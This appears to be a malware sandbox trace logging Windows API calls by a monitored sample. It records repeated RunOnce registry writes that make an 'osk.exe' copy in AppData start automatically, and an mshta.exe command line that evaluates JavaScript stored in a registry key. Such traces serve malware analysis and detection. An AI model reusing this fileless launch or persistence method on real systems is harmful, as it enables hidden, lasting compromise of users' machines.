[0112.078] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.092] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.092] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.092] KillTimer (hWnd=0x20280, uIDEvent=0x24a5) returned 1 [0112.092] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.093] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.093] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.093] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.093] RegCloseKey (hKey=0x280) returned 0x0 [0112.093] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.094] SetTimer (hWnd=0x20280, nIDEvent=0x24a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a6 [0112.094] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.117] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.117] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.117] KillTimer (hWnd=0x20280, uIDEvent=0x24a6) returned 1 [0112.117] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.118] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.118] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.118] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.118] RegCloseKey (hKey=0x280) returned 0x0 [0112.118] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.118] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.118] SetTimer (hWnd=0x20280, nIDEvent=0x24a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a7 [0112.119] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.123] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.123] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.123] KillTimer (hWnd=0x20280, uIDEvent=0x24a7) returned 1 [0112.123] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.124] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.124] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.124] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.124] RegCloseKey (hKey=0x280) returned 0x0 [0112.124] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.124] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.124] SetTimer (hWnd=0x20280, nIDEvent=0x24a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a8 [0112.124] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0112.139] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.139] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.139] KillTimer (hWnd=0x20280, uIDEvent=0x24a8) returned 1 [0112.139] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.139] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.140] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.140] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.140] RegCloseKey (hKey=0x280) returned 0x0 [0112.140] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.140] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.140] SetTimer (hWnd=0x20280, nIDEvent=0x24a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a9 [0112.140] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.156] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.156] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.156] KillTimer (hWnd=0x20280, uIDEvent=0x24a9) returned 1 [0112.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.157] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.157] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.157] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.157] RegCloseKey (hKey=0x280) returned 0x0 [0112.158] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.158] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.158] SetTimer (hWnd=0x20280, nIDEvent=0x24aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x24aa [0112.158] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.169] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.169] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.170] KillTimer (hWnd=0x20280, uIDEvent=0x24aa) returned 1 [0112.170] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.170] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.170] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.171] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.171] RegCloseKey (hKey=0x280) returned 0x0 [0112.171] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.171] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.171] SetTimer (hWnd=0x20280, nIDEvent=0x24ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x24ab [0112.171] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.185] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.185] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.185] KillTimer (hWnd=0x20280, uIDEvent=0x24ab) returned 1 [0112.185] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.186] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.186] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.186] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.186] RegCloseKey (hKey=0x280) returned 0x0 [0112.187] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.187] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.187] SetTimer (hWnd=0x20280, nIDEvent=0x24ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x24ac [0112.187] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.201] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.201] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.201] KillTimer (hWnd=0x20280, uIDEvent=0x24ac) returned 1 [0112.201] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.202] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.202] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.202] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.202] RegCloseKey (hKey=0x280) returned 0x0 [0112.202] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.202] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.202] SetTimer (hWnd=0x20280, nIDEvent=0x24ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x24ad [0112.203] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.216] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.216] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.217] KillTimer (hWnd=0x20280, uIDEvent=0x24ad) returned 1 [0112.217] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.217] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.217] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.218] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.218] RegCloseKey (hKey=0x280) returned 0x0 [0112.218] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.218] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.218] SetTimer (hWnd=0x20280, nIDEvent=0x24ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x24ae [0112.218] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.232] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.232] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.232] KillTimer (hWnd=0x20280, 
uIDEvent=0x24ae) returned 1 [0112.232] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.233] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.233] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.233] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.233] RegCloseKey (hKey=0x280) returned 0x0 [0112.233] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.233] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.234] SetTimer (hWnd=0x20280, nIDEvent=0x24af, uElapse=0xa, lpTimerFunc=0x0) returned 0x24af [0112.234] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.247] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.248] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.248] KillTimer (hWnd=0x20280, uIDEvent=0x24af) returned 1 [0112.248] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.249] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.249] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.249] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.249] RegCloseKey (hKey=0x280) returned 0x0 [0112.249] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.249] SetTimer (hWnd=0x20280, nIDEvent=0x24b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x24b0 [0112.249] GetMessageW (lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 18 os_tid = 0x8dc Thread: id = 22 os_tid = 0x93c [0067.743] GetCurrentThreadId () returned 0x93c [0067.744] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x74af0000 [0067.744] CoInitialize (pvReserved=0x0) returned 0x0 [0067.744] WaitForSingleObject (hHandle=0x164, dwMilliseconds=0x927c0) returned 0x0 [0074.694] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1006) returned 0x7cc0c8 [0074.695] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2cf8 [0074.695] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x16) returned 0x7c3e00 [0074.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7cc0c8, cbMultiByte=8, lpWideCharStr=0x7c3e04, cchWideChar=8 | out: lpWideCharStr="7955381") returned 8 [0074.695] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x108) returned 0x7cd0d8 [0074.696] WaitForSingleObject (hHandle=0x164, dwMilliseconds=0x927c0) returned 0x0 [0074.697] WaitForSingleObject (hHandle=0x164, dwMilliseconds=0x927c0) Thread: id = 25 os_tid = 0x96c [0069.264] GetCurrentThreadId () returned 0x96c Thread: id = 29 os_tid = 0x9ac [0069.676] GetCurrentThreadId () returned 0x9ac Thread: id = 30 os_tid = 0x9bc [0069.676] GetCurrentThreadId () returned 0x9bc Process: id = "8" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x4816f000" os_pid = "0x5bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x620" cmd_line = "mshta.exe \"javascript:eval(new 
ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 17 os_tid = 0x2a8 [0060.714] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fa64 | out: lpSystemTimeAsFileTime=0x18fa64*(dwLowDateTime=0xee463f80, dwHighDateTime=0x1d61645)) [0060.714] GetCurrentProcessId () returned 0x5bc [0060.714] GetCurrentThreadId () returned 0x2a8 [0060.714] GetTickCount () returned 0x1147b0a [0060.714] QueryPerformanceCounter (in: lpPerformanceCount=0x18fa5c | out: lpPerformanceCount=0x18fa5c*=18106890743) returned 1 [0060.714] GetModuleHandleA (lpModuleName=0x0) returned 0x970000 [0060.714] GetStartupInfoA (in: lpStartupInfo=0x18f970 | out: lpStartupInfo=0x18f970*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.715] GetVersionExA (in: lpVersionInformation=0x18f9c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f9c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.715] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 
0x5a0000 [0060.715] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0060.715] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0060.715] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0060.715] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0060.716] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0060.716] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.716] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.716] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.716] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.716] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.716] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.716] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.716] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.717] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.717] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.717] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.717] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.717] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, 
lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c2004f [0060.718] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.718] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.718] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.718] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.718] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.718] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.718] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.718] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.719] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.719] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.719] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.719] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.719] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.719] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.719] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.719] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.720] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.720] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.720] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.720] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.720] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.720] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 
[0060.720] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.720] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.723] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.723] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.723] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.723] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.723] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.723] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.724] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x214) returned 0x5a07d0 [0060.724] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.724] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.724] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.724] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.724] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.724] GetStartupInfoA (in: lpStartupInfo=0x18f8f4 | out: lpStartupInfo=0x18f8f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.725] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x480) returned 0x5a09f0 [0060.725] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0060.725] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0060.725] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0060.725] SetHandleCount (uNumber=0x20) returned 0x20 [0060.725] 
GetCommandLineA () returned="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" [0060.725] GetEnvironmentStringsW () returned 0x6201f0* [0060.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0060.725] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x565) returned 0x5a0e78 [0060.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x5a0e78, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0060.725] FreeEnvironmentStringsW (penv=0x6201f0) returned 1 [0060.725] GetLastError () returned 0x0 [0060.725] SetLastError 